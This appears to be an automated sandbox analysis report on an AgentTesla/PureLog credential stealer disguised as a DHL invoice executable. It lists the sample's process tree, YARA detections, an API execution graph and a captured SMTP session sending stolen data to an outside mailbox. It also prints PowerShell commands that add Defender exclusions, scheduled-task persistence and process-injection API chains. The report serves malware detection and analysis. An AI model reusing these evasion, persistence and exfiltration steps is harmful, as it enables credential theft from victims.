                                                Apr 26, 2024 10:06:39.096745014 CEST49731587192.168.2.650.87.253.239EHLO 216554
                                                Apr 26, 2024 10:06:39.293577909 CEST5874973150.87.253.239192.168.2.6250-box2224.bluehost.com Hello 216554 [102.129.152.220]
                                                250-SIZE 52428800
                                                250-8BITMIME
                                                250-PIPELINING
                                                250-PIPECONNECT
                                                250-AUTH PLAIN LOGIN
                                                250-STARTTLS
                                                250 HELP
                                                Apr 26, 2024 10:06:39.294231892 CEST49731587192.168.2.650.87.253.239AUTH login Z21AY2xzbGsuY29t
                                                Apr 26, 2024 10:06:39.491781950 CEST5874973150.87.253.239192.168.2.6334 UGFzc3dvcmQ6
                                                Apr 26, 2024 10:06:39.690692902 CEST5874973150.87.253.239192.168.2.6235 Authentication succeeded
                                                Apr 26, 2024 10:06:39.690979958 CEST49731587192.168.2.650.87.253.239MAIL FROM:<gm@clslk.com>
                                                Apr 26, 2024 10:06:39.887558937 CEST5874973150.87.253.239192.168.2.6250 OK
                                                Apr 26, 2024 10:06:39.887757063 CEST49731587192.168.2.650.87.253.239RCPT TO:<devendra@syncro-group.xyz>
                                                Apr 26, 2024 10:06:40.161436081 CEST5874973150.87.253.239192.168.2.6250 Accepted
                                                Apr 26, 2024 10:06:40.161607981 CEST49731587192.168.2.650.87.253.239DATA
                                                Apr 26, 2024 10:06:40.358381987 CEST5874973150.87.253.239192.168.2.6354 Enter message, ending with "." on a line by itself
                                                Apr 26, 2024 10:06:40.359334946 CEST49731587192.168.2.650.87.253.239.
                                                Apr 26, 2024 10:06:40.557014942 CEST5874973150.87.253.239192.168.2.6250 OK id=1s0GbQ-003cRz-0p
                                                Apr 26, 2024 10:08:18.643331051 CEST49731587192.168.2.650.87.253.239QUIT
                                                Apr 26, 2024 10:08:19.041877985 CEST5874973150.87.253.239192.168.2.6221 box2224.bluehost.com closing connection

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:1
                                                Start time:10:06:17
                                                Start date:26/04/2024
                                                Path:C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"
                                                Imagebase:0x620000
                                                File size:881'664 bytes
                                                MD5 hash:840CBF490CE0600E1057F72949A37C73
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.2353913822.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000001.00000002.2359343012.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.2353913822.0000000004467000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:10:06:22
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe"
                                                Imagebase:0x440000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:10:06:22
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:10:06:22
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LJAGvecDW.exe"
                                                Imagebase:0x440000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:10:06:23
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:10:06:23
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp"
                                                Imagebase:0x7e0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:10:06:23
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:10:06:23
                                                Start date:26/04/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                Imagebase:0xd20000
                                                File size:45'984 bytes
                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2413879455.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2408863258.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2413879455.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2413879455.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2413879455.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:10:06:24
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 1400
                                                Imagebase:0x120000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:10:06:25
                                                Start date:26/04/2024
                                                Path:C:\Users\user\AppData\Roaming\LJAGvecDW.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\AppData\Roaming\LJAGvecDW.exe
                                                Imagebase:0x1c0000
                                                File size:881'664 bytes
                                                MD5 hash:840CBF490CE0600E1057F72949A37C73
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 45%, ReversingLabs
                                                • Detection: 51%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:14
                                                Start time:10:06:26
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff717f30000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:10:06:33
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmpA44C.tmp"
                                                Imagebase:0x7e0000
                                                File size:187'904 bytes
                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:10:06:33
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:18
                                                Start time:10:06:33
                                                Start date:26/04/2024
                                                Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                Imagebase:0xf90000
                                                File size:45'984 bytes
                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 0%, ReversingLabs
                                                • Detection: 0%, Virustotal, Browse
                                                Reputation:high
                                                Has exited:true

                                                Target ID:19
                                                Start time:10:06:34
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:10:06:34
                                                Start date:26/04/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                Imagebase:0xa60000
                                                File size:45'984 bytes
                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3497093745.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3497093745.0000000002C97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.3497093745.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.3497093745.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Has exited:false

                                                Target ID:22
                                                Start time:10:06:34
                                                Start date:26/04/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 1760
                                                Imagebase:0x120000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:10:06:42
                                                Start date:26/04/2024
                                                Path:C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
                                                Imagebase:0xec0000
                                                File size:45'984 bytes
                                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:27
                                                Start time:10:06:42
                                                Start date:26/04/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:10.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:1%
                                                  Total number of Nodes:296
                                                  Total number of Limit Nodes:18
                                                  execution_graph 58476 10be1a8 DuplicateHandle 58477 10be23e 58476->58477 58539 10b4668 58540 10b467a 58539->58540 58541 10b4686 58540->58541 58543 10b4779 58540->58543 58544 10b479d 58543->58544 58548 10b4888 58544->58548 58552 10b4877 58544->58552 58545 10b47a7 58545->58541 58549 10b48af 58548->58549 58551 10b498c 58549->58551 58557 10b4538 58549->58557 58551->58545 58553 10b482c 58552->58553 58555 10b4887 58552->58555 58553->58545 58554 10b498c 58554->58545 58555->58554 58556 10b4538 CreateActCtxA 58555->58556 58556->58554 58558 10b5d18 CreateActCtxA 58557->58558 58560 10b5ddb 58558->58560 58560->58560 58478 73ebb18 58479 73ebb3d KiUserExceptionDispatcher 58478->58479 58480 73ebb38 58478->58480 58481 73ebb64 58479->58481 58480->58479 58510 78f0e58 58511 78f0e71 58510->58511 58513 78f0f6c 58511->58513 58514 5049bd8 GetCurrentThreadId 58511->58514 58515 5049bc9 GetCurrentThreadId 58511->58515 58512 78f0ed1 58514->58512 58515->58512 58516 10bbbd0 58517 10bbbdf 58516->58517 58519 10bbcb8 58516->58519 58520 10bbcd9 58519->58520 58522 10bbcfc 58519->58522 58520->58522 58527 10bbf50 58520->58527 58531 10bbf60 58520->58531 58521 10bbcf4 58521->58522 58523 10bbf00 GetModuleHandleW 58521->58523 58522->58517 58524 10bbf2d 58523->58524 58524->58517 58528 10bbf74 58527->58528 58529 10bbf99 58528->58529 58535 10bb6c8 58528->58535 58529->58521 58532 10bbf74 58531->58532 58533 10bb6c8 LoadLibraryExW 58532->58533 58534 10bbf99 58532->58534 58533->58534 58534->58521 58536 10bc140 LoadLibraryExW 58535->58536 58538 10bc1b9 58536->58538 58538->58529 58561 10bdf60 58562 10bdfa6 GetCurrentProcess 58561->58562 58564 10bdff8 GetCurrentThread 58562->58564 58565 10bdff1 58562->58565 58566 10be02e 58564->58566 58567 10be035 GetCurrentProcess 58564->58567 58565->58564 58566->58567 58568 10be06b 58567->58568 58569 10be093 GetCurrentThreadId 58568->58569 58570 10be0c4 58569->58570 58207 5041808 58208 5041847 58207->58208 58209 5041f58 58208->58209 58212 5049bd8 58208->58212 58226 5049bc9 58208->58226 58213 5049c03 58212->58213 58214 5049bfc 58212->58214 58219 5049c56 58213->58219 58240 5046d84 58213->58240 58214->58209 58217 5046d84 GetCurrentThreadId 58218 5049c2a 58217->58218 58218->58219 58244 78f11e8 58218->58244 58250 504a102 58218->58250 58258 78f11d9 58218->58258 58264 504a128 58218->58264 58272 78faf48 58218->58272 58277 78faf38 58218->58277 58219->58209 58227 5049c03 58226->58227 58228 5049bfc 58226->58228 58229 5046d84 GetCurrentThreadId 58227->58229 58232 5049c56 58227->58232 58228->58209 58230 5049c20 58229->58230 58231 5046d84 GetCurrentThreadId 58230->58231 58233 5049c2a 58231->58233 58232->58209 58233->58232 58234 78f11d9 GetCurrentThreadId 58233->58234 58235 504a102 GetCurrentThreadId 58233->58235 58236 78f11e8 GetCurrentThreadId 58233->58236 58237 78faf38 GetCurrentThreadId 58233->58237 58238 78faf48 GetCurrentThreadId 58233->58238 58239 504a128 GetCurrentThreadId 58233->58239 58234->58232 58235->58232 58236->58232 58237->58232 58238->58232 58239->58232 58241 5046d8f 58240->58241 58242 5049f3f GetCurrentThreadId 58241->58242 58243 5049c20 58241->58243 58242->58243 58243->58217 58245 78f11f5 58244->58245 58247 78f1212 58245->58247 58248 504a102 GetCurrentThreadId 58245->58248 58249 504a128 GetCurrentThreadId 58245->58249 58246 78f120e 58246->58219 58247->58219 58248->58246 58249->58246 58251 504a149 58250->58251 58253 504a1cb 58251->58253 58256 78f11d9 GetCurrentThreadId 58251->58256 58257 78f11e8 GetCurrentThreadId 58251->58257 58252 504a191 58252->58253 58282 78f2f1f 58252->58282 58288 78f2f30 58252->58288 58253->58219 58256->58252 58257->58252 58259 78f11f5 58258->58259 58261 78f1212 58259->58261 58262 504a102 GetCurrentThreadId 58259->58262 58263 504a128 GetCurrentThreadId 58259->58263 58260 78f120e 58260->58219 58261->58219 58262->58260 58263->58260 58265 504a149 58264->58265 58267 504a1cb 58265->58267 58270 78f11d9 GetCurrentThreadId 58265->58270 58271 78f11e8 GetCurrentThreadId 58265->58271 58266 504a191 58266->58267 58268 78f2f1f GetCurrentThreadId 58266->58268 58269 78f2f30 GetCurrentThreadId 58266->58269 58267->58219 58268->58267 58269->58267 58270->58266 58271->58266 58273 78faf5d 58272->58273 58275 504a102 GetCurrentThreadId 58273->58275 58276 504a128 GetCurrentThreadId 58273->58276 58274 78faf6e 58274->58219 58275->58274 58276->58274 58278 78faf5d 58277->58278 58280 504a102 GetCurrentThreadId 58278->58280 58281 504a128 GetCurrentThreadId 58278->58281 58279 78faf6e 58279->58219 58280->58279 58281->58279 58283 78f2f2b 58282->58283 58285 78f2f56 58283->58285 58286 5049bd8 GetCurrentThreadId 58283->58286 58287 5049bc9 GetCurrentThreadId 58283->58287 58284 78f2f52 58284->58253 58285->58253 58286->58284 58287->58284 58289 78f2f45 58288->58289 58291 78f2f56 58289->58291 58292 5049bd8 GetCurrentThreadId 58289->58292 58293 5049bc9 GetCurrentThreadId 58289->58293 58290 78f2f52 58290->58253 58291->58253 58292->58290 58293->58290 58294 73e6932 58295 73e693c 58294->58295 58296 73e65b4 58294->58296 58297 73e67ea 58296->58297 58301 73e9db6 58296->58301 58317 73e9d41 58296->58317 58332 73e9d50 58296->58332 58302 73e9d44 58301->58302 58304 73e9db9 58301->58304 58347 73ea1fc 58302->58347 58353 73eaa51 58302->58353 58358 73ea300 58302->58358 58363 73ea6e3 58302->58363 58368 73ea182 58302->58368 58373 73ea874 58302->58373 58378 73eaa04 58302->58378 58382 73ea174 58302->58382 58387 73ea927 58302->58387 58391 73ea548 58302->58391 58400 73ea46b 58302->58400 58405 73ea70a 58302->58405 58303 73e9d72 58303->58297 58318 73e9d6a 58317->58318 58320 73ea1fc 2 API calls 58318->58320 58321 73ea70a 2 API calls 58318->58321 58322 73ea46b 2 API calls 58318->58322 58323 73ea548 4 API calls 58318->58323 58324 73ea927 2 API calls 58318->58324 58325 73ea174 2 API calls 58318->58325 58326 73eaa04 2 API calls 58318->58326 58327 73ea874 2 API calls 58318->58327 58328 73ea182 2 API calls 58318->58328 58329 73ea6e3 2 API calls 58318->58329 58330 73ea300 2 API calls 58318->58330 58331 73eaa51 2 API calls 58318->58331 58319 73e9d72 58319->58297 58320->58319 58321->58319 58322->58319 58323->58319 58324->58319 58325->58319 58326->58319 58327->58319 58328->58319 58329->58319 58330->58319 58331->58319 58333 73e9d6a 58332->58333 58335 73ea1fc 2 API calls 58333->58335 58336 73ea70a 2 API calls 58333->58336 58337 73ea46b 2 API calls 58333->58337 58338 73ea548 4 API calls 58333->58338 58339 73ea927 2 API calls 58333->58339 58340 73ea174 2 API calls 58333->58340 58341 73eaa04 2 API calls 58333->58341 58342 73ea874 2 API calls 58333->58342 58343 73ea182 2 API calls 58333->58343 58344 73ea6e3 2 API calls 58333->58344 58345 73ea300 2 API calls 58333->58345 58346 73eaa51 2 API calls 58333->58346 58334 73e9d72 58334->58297 58335->58334 58336->58334 58337->58334 58338->58334 58339->58334 58340->58334 58341->58334 58342->58334 58343->58334 58344->58334 58345->58334 58346->58334 58349 73ea18f 58347->58349 58348 73ead30 58348->58303 58349->58348 58410 73e6138 58349->58410 58414 73e612c 58349->58414 58354 73eaa03 58353->58354 58418 73e5aa8 58354->58418 58422 73e5ab0 58354->58422 58355 73eaa32 58359 73ea30d 58358->58359 58426 73e5868 58359->58426 58430 73e5862 58359->58430 58360 73ea4a5 58364 73ea6ec 58363->58364 58366 73e5aa8 WriteProcessMemory 58364->58366 58367 73e5ab0 WriteProcessMemory 58364->58367 58365 73eabf7 58366->58365 58367->58365 58369 73ea174 58368->58369 58369->58303 58371 73e612c CreateProcessA 58369->58371 58372 73e6138 CreateProcessA 58369->58372 58370 73ea2bd 58370->58303 58371->58370 58372->58370 58434 73e5b9a 58373->58434 58438 73e5ba0 58373->58438 58374 73ea5a3 58374->58373 58375 73eaa96 58374->58375 58375->58303 58380 73e5aa8 WriteProcessMemory 58378->58380 58381 73e5ab0 WriteProcessMemory 58378->58381 58379 73eaa32 58380->58379 58381->58379 58383 73ea17e 58382->58383 58385 73e612c CreateProcessA 58383->58385 58386 73e6138 CreateProcessA 58383->58386 58384 73ea2bd 58384->58303 58385->58384 58386->58384 58442 73e5918 58387->58442 58446 73e5912 58387->58446 58388 73ea86b 58388->58387 58392 73ea54e 58391->58392 58450 73eae72 58392->58450 58456 73eae80 58392->58456 58393 73ea6ce 58394 73eab2c 58393->58394 58396 73e5aa8 WriteProcessMemory 58393->58396 58397 73e5ab0 WriteProcessMemory 58393->58397 58394->58303 58395 73ea742 58396->58395 58397->58395 58401 73ea99b 58400->58401 58403 73e5918 Wow64SetThreadContext 58401->58403 58404 73e5912 Wow64SetThreadContext 58401->58404 58402 73ea2e8 58403->58402 58404->58402 58406 73ea710 58405->58406 58408 73e5aa8 WriteProcessMemory 58406->58408 58409 73e5ab0 WriteProcessMemory 58406->58409 58407 73ea742 58408->58407 58409->58407 58411 73e61c1 CreateProcessA 58410->58411 58413 73e6383 58411->58413 58415 73e61c1 CreateProcessA 58414->58415 58417 73e6383 58415->58417 58419 73e5ab0 WriteProcessMemory 58418->58419 58421 73e5b4f 58419->58421 58421->58355 58423 73e5af8 WriteProcessMemory 58422->58423 58425 73e5b4f 58423->58425 58425->58355 58427 73e58a8 ResumeThread 58426->58427 58429 73e58d9 58427->58429 58429->58360 58431 73e58a8 ResumeThread 58430->58431 58433 73e58d9 58431->58433 58433->58360 58435 73e5beb ReadProcessMemory 58434->58435 58437 73e5c2f 58435->58437 58437->58374 58439 73e5beb ReadProcessMemory 58438->58439 58441 73e5c2f 58439->58441 58441->58374 58443 73e595d Wow64SetThreadContext 58442->58443 58445 73e59a5 58443->58445 58445->58388 58447 73e595d Wow64SetThreadContext 58446->58447 58449 73e59a5 58447->58449 58449->58388 58451 73eae7b 58450->58451 58452 73eae14 58450->58452 58461 73e59e8 58451->58461 58465 73e59f0 58451->58465 58452->58393 58453 73eaeb4 58453->58393 58457 73eae95 58456->58457 58459 73e59e8 VirtualAllocEx 58457->58459 58460 73e59f0 VirtualAllocEx 58457->58460 58458 73eaeb4 58458->58393 58459->58458 58460->58458 58462 73e5a30 VirtualAllocEx 58461->58462 58464 73e5a6d 58462->58464 58464->58453 58466 73e5a30 VirtualAllocEx 58465->58466 58468 73e5a6d 58466->58468 58468->58453 58482 5049838 58483 5049854 58482->58483 58486 50498b0 58482->58486 58490 50498c0 58482->58490 58487 50498cf 58486->58487 58494 5046d34 58487->58494 58489 504992b 58489->58483 58491 50498cf 58490->58491 58492 5046d34 GetCurrentThreadId 58491->58492 58493 504992b 58492->58493 58493->58483 58495 5046d3f 58494->58495 58496 50499a1 58495->58496 58500 504db38 58495->58500 58505 504db48 58495->58505 58496->58489 58497 504997e 58497->58489 58502 504db80 58500->58502 58501 504db88 58501->58497 58502->58501 58503 78f11d9 GetCurrentThreadId 58502->58503 58504 78f11e8 GetCurrentThreadId 58502->58504 58503->58501 58504->58501 58507 504db80 58505->58507 58506 504db88 58506->58497 58507->58506 58508 78f11d9 GetCurrentThreadId 58507->58508 58509 78f11e8 GetCurrentThreadId 58507->58509 58508->58506 58509->58506 58469 73eafa0 58470 73eb12b 58469->58470 58472 73eafc6 58469->58472 58472->58470 58473 73e5df0 58472->58473 58474 73eb220 PostMessageW 58473->58474 58475 73eb28c 58474->58475 58475->58472 58571 78f9ee0 58572 78f9f2e DrawTextExW 58571->58572 58574 78f9f86 58572->58574

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 44 702a688-702a6a9 45 702a6b0-702a79c 44->45 46 702a6ab 44->46 48 702a7a2-702a8f9 45->48 49 702afce-702aff6 45->49 46->45 93 702a8ff-702a95a 48->93 94 702af9c-702afcb 48->94 52 702b6df-702b6e8 49->52 53 702b004-702b00d 52->53 54 702b6ee-702b705 52->54 56 702b014-702b108 53->56 57 702b00f 53->57 75 702b132 56->75 76 702b10a-702b116 56->76 57->56 80 702b138-702b158 75->80 78 702b120-702b126 76->78 79 702b118-702b11e 76->79 81 702b130 78->81 79->81 84 702b15a-702b1b3 80->84 85 702b1b8-702b232 80->85 81->80 98 702b6dc 84->98 104 702b234-702b287 85->104 105 702b289-702b2cc 85->105 100 702a95f-702a96a 93->100 101 702a95c 93->101 94->49 98->52 106 702aeae-702aeb4 100->106 101->100 134 702b2d7-702b2dd 104->134 105->134 107 702aeba-702af37 106->107 108 702a96f-702a98d 106->108 151 702af86-702af8c 107->151 111 702a9e4-702a9f9 108->111 112 702a98f-702a993 108->112 114 702aa00-702aa16 111->114 115 702a9fb 111->115 112->111 117 702a995-702a9a0 112->117 119 702aa18 114->119 120 702aa1d-702aa34 114->120 115->114 121 702a9d6-702a9dc 117->121 119->120 125 702aa36 120->125 126 702aa3b-702aa51 120->126 123 702a9a2-702a9a6 121->123 124 702a9de-702a9df 121->124 130 702a9a8 123->130 131 702a9ac-702a9c4 123->131 128 702aa62-702aad3 124->128 125->126 132 702aa53 126->132 133 702aa58-702aa5f 126->133 135 702aad5 128->135 136 702aae9-702ac61 128->136 130->131 138 702a9c6 131->138 139 702a9cb-702a9d3 131->139 132->133 133->128 140 702b334-702b340 134->140 135->136 141 702aad7-702aae3 135->141 148 702ac63 136->148 149 702ac77-702adb2 136->149 138->139 139->121 142 702b342-702b3ca 140->142 143 702b2df-702b301 140->143 141->136 169 702b54f-702b558 142->169 146 702b303 143->146 147 702b308-702b331 143->147 146->147 147->140 148->149 153 702ac65-702ac71 148->153 163 702ae16-702ae2b 149->163 164 702adb4-702adb8 149->164 154 702af39-702af83 151->154 155 702af8e-702af94 151->155 153->149 154->151 155->94 165 702ae32-702ae53 163->165 166 702ae2d 163->166 164->163 167 702adba-702adc9 164->167 171 702ae55 165->171 172 702ae5a-702ae79 165->172 166->165 173 702ae08-702ae0e 167->173 176 702b55e-702b5b9 169->176 177 702b3cf-702b3e4 169->177 171->172 178 702ae80-702aea0 172->178 179 702ae7b 172->179 174 702ae10-702ae11 173->174 175 702adcb-702adcf 173->175 186 702aeab 174->186 180 702add1-702add5 175->180 181 702add9-702adfa 175->181 201 702b5f0-702b61a 176->201 202 702b5bb-702b5ee 176->202 182 702b3e6 177->182 183 702b3ed-702b543 177->183 184 702aea2 178->184 185 702aea7 178->185 179->178 180->181 187 702ae01-702ae05 181->187 188 702adfc 181->188 182->183 189 702b4c2-702b502 182->189 190 702b3f3-702b433 182->190 191 702b438-702b478 182->191 192 